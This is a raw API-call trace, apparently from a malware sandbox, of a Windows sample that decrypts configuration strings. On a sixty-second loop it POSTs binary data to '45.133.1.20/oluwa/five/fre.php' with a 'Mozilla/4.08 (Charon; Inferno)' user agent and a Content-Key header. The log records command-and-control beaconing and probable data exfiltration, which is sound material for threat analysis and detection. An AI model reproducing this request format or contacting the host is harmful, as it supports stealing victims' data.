[0242.200] GetProcessHeap () returned 0x6a0000 [0242.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0242.200] GetProcessHeap () returned 0x6a0000 [0242.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.200] GetProcessHeap () returned 0x6a0000 [0242.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0242.201] GetProcessHeap () returned 0x6a0000 [0242.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0242.201] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6db728, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f0) returned 0x7bc [0242.204] Sleep (dwMilliseconds=0xea60) [0242.206] GetProcessHeap () returned 0x6a0000 [0242.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0242.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.208] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0242.230] GetProcessHeap () returned 0x6a0000 [0242.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0242.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.231] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0242.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.232] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.233] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.234] GetProcessHeap () returned 0x6a0000 [0242.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0242.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.235] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0242.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.237] CryptDestroyKey (hKey=0x6ad020) returned 1 [0242.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.238] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0242.238] GetProcessHeap () returned 0x6a0000 [0242.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.243] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.245] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.246] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.250] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.250] GetProcessHeap () returned 0x6a0000 [0242.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0242.250] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.251] GetProcessHeap () returned 0x6a0000 [0242.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0242.251] GetProcessHeap () returned 0x6a0000 [0242.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.252] GetProcessHeap () returned 0x6a0000 [0242.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0242.252] GetProcessHeap () returned 0x6a0000 [0242.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0242.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0242.268] GetProcessHeap () returned 0x6a0000 [0242.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0242.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.269] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0242.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.271] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.272] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.272] GetProcessHeap () returned 0x6a0000 [0242.273] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0242.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.274] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0242.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.275] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0242.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.276] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0242.276] GetProcessHeap () returned 0x6a0000 [0242.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.277] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.278] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0242.278] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.279] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0242.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.280] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0242.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0242.281] GetProcessHeap () returned 0x6a0000 [0242.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0242.282] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0242.282] GetProcessHeap () returned 0x6a0000 [0242.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0242.282] socket (af=2, type=1, protocol=6) returned 0x7c0 [0242.282] connect (s=0x7c0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0242.307] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0242.307] GetProcessHeap () returned 0x6a0000 [0242.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0242.307] GetProcessHeap () returned 0x6a0000 [0242.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0242.308] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.309] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.310] GetProcessHeap () returned 0x6a0000 [0242.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c54b8 [0242.310] GetProcessHeap () returned 0x6a0000 [0242.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.310] GetProcessHeap () returned 0x6a0000 [0242.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0242.310] GetProcessHeap () returned 0x6a0000 [0242.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0242.311] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.312] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.312] GetProcessHeap () returned 0x6a0000 [0242.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0242.312] GetProcessHeap () returned 0x6a0000 [0242.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.313] send (s=0x7c0, buf=0x6bd460*, len=242, flags=0) returned 242 [0242.314] send (s=0x7c0, buf=0x6bb998*, len=159, flags=0) returned 159 [0242.314] GetProcessHeap () returned 0x6a0000 [0242.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6db728 [0242.314] recv (in: s=0x7c0, buf=0x6db728, len=4048, flags=0 | out: buf=0x6db728*) returned 204 [0242.394] GetProcessHeap () returned 0x6a0000 [0242.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0242.395] GetProcessHeap () returned 0x6a0000 [0242.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0242.395] GetProcessHeap () returned 0x6a0000 [0242.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c54b8 | out: hHeap=0x6a0000) returned 1 [0242.397] GetProcessHeap () returned 0x6a0000 [0242.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0242.397] closesocket (s=0x7c0) returned 0 [0242.399] GetProcessHeap () returned 0x6a0000 [0242.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0242.399] GetProcessHeap () returned 0x6a0000 [0242.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.399] GetProcessHeap () returned 0x6a0000 [0242.399] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0242.400] GetProcessHeap () returned 0x6a0000 [0242.400] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0242.412] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6db728, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f4) returned 0x7c0 [0242.414] Sleep (dwMilliseconds=0xea60) [0242.416] GetProcessHeap () returned 0x6a0000 [0242.416] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0242.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.417] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.428] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0242.438] GetProcessHeap () returned 0x6a0000 [0242.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0242.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.439] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0242.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.441] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.442] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.442] GetProcessHeap () returned 0x6a0000 [0242.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0242.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.449] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0242.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.450] CryptDestroyKey (hKey=0x6ad520) returned 1 [0242.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.452] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0242.452] GetProcessHeap () returned 0x6a0000 [0242.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.452] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.453] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.454] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.454] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.455] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.455] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.457] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.457] GetProcessHeap () returned 0x6a0000 [0242.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0242.457] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.457] GetProcessHeap () returned 0x6a0000 [0242.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0242.458] GetProcessHeap () returned 0x6a0000 [0242.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.458] GetProcessHeap () returned 0x6a0000 [0242.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0242.459] GetProcessHeap () returned 0x6a0000 [0242.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0242.459] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.467] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0242.475] GetProcessHeap () returned 0x6a0000 [0242.475] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0242.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.477] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0242.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.478] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.479] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.479] GetProcessHeap () returned 0x6a0000 [0242.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0242.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.481] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0242.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.482] CryptDestroyKey (hKey=0x6ad560) returned 1 [0242.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.484] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0242.484] GetProcessHeap () returned 0x6a0000 [0242.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.486] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0242.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.487] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0242.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.488] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0242.489] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.489] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0242.489] GetProcessHeap () returned 0x6a0000 [0242.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0242.489] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0242.489] GetProcessHeap () returned 0x6a0000 [0242.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0242.490] socket (af=2, type=1, protocol=6) returned 0x7c4 [0242.490] connect (s=0x7c4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0242.519] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0242.519] GetProcessHeap () returned 0x6a0000 [0242.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0242.519] GetProcessHeap () returned 0x6a0000 [0242.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0242.520] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.521] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.521] GetProcessHeap () returned 0x6a0000 [0242.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4df8 [0242.522] GetProcessHeap () returned 0x6a0000 [0242.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.522] GetProcessHeap () returned 0x6a0000 [0242.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0242.522] GetProcessHeap () returned 0x6a0000 [0242.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0242.523] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.524] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.524] GetProcessHeap () returned 0x6a0000 [0242.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0242.524] GetProcessHeap () returned 0x6a0000 [0242.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.525] send (s=0x7c4, buf=0x6bd460*, len=242, flags=0) returned 242 [0242.525] send (s=0x7c4, buf=0x6bb998*, len=159, flags=0) returned 159 [0242.525] GetProcessHeap () returned 0x6a0000 [0242.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6db728 [0242.526] recv (in: s=0x7c4, buf=0x6db728, len=4048, flags=0 | out: buf=0x6db728*) returned 204 [0242.602] GetProcessHeap () returned 0x6a0000 [0242.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0242.603] GetProcessHeap () returned 0x6a0000 [0242.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0242.603] GetProcessHeap () returned 0x6a0000 [0242.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4df8 | out: hHeap=0x6a0000) returned 1 [0242.604] GetProcessHeap () returned 0x6a0000 [0242.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0242.605] closesocket (s=0x7c4) returned 0 [0242.606] GetProcessHeap () returned 0x6a0000 [0242.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0242.606] GetProcessHeap () returned 0x6a0000 [0242.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.606] GetProcessHeap () returned 0x6a0000 [0242.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0242.607] GetProcessHeap () returned 0x6a0000 [0242.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0242.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6db728, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14f8) returned 0x7c4 [0242.610] Sleep (dwMilliseconds=0xea60) [0242.612] GetProcessHeap () returned 